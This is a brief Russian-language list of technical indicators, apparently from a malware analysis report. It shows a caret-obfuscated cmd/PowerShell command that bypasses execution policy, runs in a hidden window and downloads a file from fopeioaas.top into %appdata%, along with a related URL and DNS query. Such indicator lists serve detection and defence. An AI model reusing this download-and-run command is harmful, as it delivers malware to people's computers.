Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWeR^S^Hel^l.^eX^E^ ^-^E^Xe^cut^Io^npOLIc^y ^b^YpA^SS -n^OPR^ofiL^e -wINdOw^S^T^Y^Le^ ^hId^D^en ^(New-Obj^Ect S^YsTE^m.^NE^T.w^Ebc^li^ENt^).do^wn^L^OaDF^iLE('http://www.fopeio...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "P^oWeR^S^Hel^l.^eX^E^ ^-^E^Xe^cut^Io^npOLIc^y ^b^YpA^SS -n^OPR^ofiL^e -wINdOw^S^T^Y^Le^ ^hId^D^en ^(New-Obj^Ect S^YsTE^m.^NE^T.w^Ebc^li^ENt^).do^wn^L^OaDF^iLE('http://www.fopeio...' (со скрытым окном)